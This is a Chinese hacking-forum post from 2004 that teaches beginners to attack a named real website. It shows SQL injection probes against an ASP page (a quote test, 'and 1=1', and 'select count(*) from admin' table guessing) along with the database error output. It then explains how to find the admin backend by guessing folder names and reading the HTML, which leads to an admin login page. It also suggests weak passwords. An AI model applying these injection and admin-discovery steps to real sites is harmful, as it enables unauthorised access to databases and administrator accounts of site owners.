QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 5118|回复: 0
打印 上一主题 下一主题

菜鸟,我来牵你走--如何查看代码

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-4 00:36 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
作者:枫三少  转自:黑基bbs原创作品版
: A3 l* }8 o. M: Q
9 h/ ]6 ^* _. j* J0 R有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?- u) b& f. |9 ~$ C7 v5 z( H8 q0 w

2 n9 ^, Z7 c6 {( P2 @- E$ \分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。7 F/ Z: v7 A) d  j

, l0 W- p  ?* p* \5 K在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。1 ]1 E8 N9 s- k+ O% z  w* B
9 n3 r! W! G" n! Y" u- ^
这里我简单的介绍一个过程吧。
* ]/ A& Y: E5 r' e( D  h, `
. L$ u0 Q( s' h, w1 h$ f6 [( R首先我找到一个网站,是我们基地首页有连接的# k/ T  \  R# ]2 L
http://www.16china.com/hack/
# P1 w0 |/ {  Q% a3 H; E0 L) {% a( |1 k0 }5 M7 B' g' y
随便选择一个分页:
# D) G& R3 U, q( @http://www.16china.com/hack/SoftView.Asp?SoftID=139% O1 S$ u; U1 B4 c
典型的ASP。看看能不能注射
3 x/ J; ?; \$ L. ]* W. o$ hhttp://www.16china.com/hack/SoftView.Asp?SoftID=139'4 ?( A1 f' L" I- O% T& }
返回:$ _; @; X1 R1 l/ f
Microsoft VBScript 编译器错误 错误 '800a03f6'
: E( ^$ x/ f: G  n- A3 L% a9 K6 Q2 x+ W3 a
缺少 'End' 6 B9 O$ f+ V; o" U7 p/ [0 G5 Y
1 V# Q! q9 [! x& P+ O
/iisHelp/common/500-100.asp,行242
1 T: f4 V3 m& ?* j- h: N6 q! _- d- ?& z5 y( r# b- @# S9 d
Microsoft JET Database Engine 错误 '80040e14' # j* {, c7 P$ P% k7 D
, f& Q! y  L5 ?# y+ C3 o
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 ( O! P/ ^* |' U% b. ?% p/ b

) X, c* J% o% v/hack/SoftView.Asp,行17
+ r% y0 G, H; [# Z再来:
, i0 ^+ t- e, |, P$ W5 P8 jhttp://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1
2 H  J' N9 ^* s$ L5 Z, _" H5 w0 n返回正常网页。( M7 ^) J0 q. \, e+ a) U- D' e
" |, ]7 u) y" b: B& R7 l) J
提交:
* N0 U# W+ @8 S& a& E* x$ nhttp://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=0
( `+ [9 e9 \( Y/ d+ t  I0 \1 h5 F6 i/ r* }* Q/ @
返回正常页/, A$ s% Y# R1 Q" `' @
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0
) i1 T/ W  H1 w
- @" f6 C$ H% X同样正常。3 B/ S1 F$ h2 d  x4 x- D/ |4 _
1 h( Y8 s$ `  J1 J! ?9 o: ~
http://www.16china.com/hack/Soft ... )%20from%20article)>=0
/ K' L' O' w6 F/ @, ?5 s) F: n' z; }' b- ]5 W* T
……, j6 c( H- a: g5 F

; ]$ `+ [2 C* J8 n; w象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台
- {" D) B9 N' Y: \, [6 H. c& }按以往的经验我采用:9 O; l/ H# m: x% E: G# O
http://www.16china.com/hack/admin  /*这里的”ADMIN“可以用LOGIN等替换*/2 l; ^: O+ a8 O1 b. P0 L$ v
我为什么不用http://www.16china.com/hack/admin.asp
, {3 }6 @& ^5 T* k9 G) ]http://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
4 v6 q- r- M* b! g4 G  lhttp://www.16china.com/hack/admin返回信息:
* Q$ A- N. N$ [7 t错误提示信息! 0 ]/ v) ~0 P6 f8 Q1 \4 E" y
  产生错误的可能原因:
  p/ u4 u( Z2 a; @4 X3 ^, |' z
/ G, P% _6 v- S6 Q
您没有进入本页面的权限!本次操作已被记录!
. c9 s3 j% j0 O5 I1 f可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.
6 N+ N% O& B: F7 U& f5 i% L本页面为[管理员]专用,请先登陆后进入., p. I" R& N- m  o4 {- y* C

8 T6 [/ W& U. t返回上一页... /*说明登陆URL为常用的如:index.asp...*/7 u6 i  B6 O. o  D* `
查看HTML代码:
$ K' X+ c) c& W/ z' s<html><head><title>错误提示信息!</title>
- q6 q( G! W8 ?0 ^2 [: s4 i9 s' ^" y
……3 \' G  ~$ A9 t( d* g) o6 H  a
; V3 V. P1 g3 P# k
<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.  o& Y) M, e$ h# I
……- z  M' R" k; m4 a7 S

: X5 `5 p# M2 s+ A8 \& G) U- r8 g找到了:$ K% R+ \, ^% E( C4 K" b. y1 X. r
http://www.16china.com/hack/admin/adminlogin.asp. y) y0 @- b- e# b

/ g7 O( Z9 ^2 b: W9 Q" q# a+ z3 R, N9 Y
看看他的源代码告诉我们些什么:7 A$ s/ c4 G- g$ ~! V% |' D

' C9 B/ n- b4 S<html>, N) |& J: d1 p7 N
0 g/ l9 B% i8 U
<head>
- {& O. U! ?/ n. U<title>管理员登陆</title>6 j9 p9 e) _: ]( ~1 q6 {; C, K/ t# f
. v# ?" j+ d" G* N) B# U' u
……………
6 W7 h4 _2 e8 r0 i3 e' V. I) E7 R$ X6 A/ F, |- C
关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入# g9 M$ v0 u& G& ^! X
http://www.16china.com/hack/admin/adminlogin.asp?action=login
& g5 E) J/ t8 z4 E这里。
/ W, R  C5 a% |$ K' E7 r$ M" P* V; g
只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……
) c# o: ]4 b7 O. h5 R: W; _% C7 l% ~2 m
懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:)
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持1 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-6-11 03:17 , Processed in 0.401155 second(s), 52 queries .

回顶部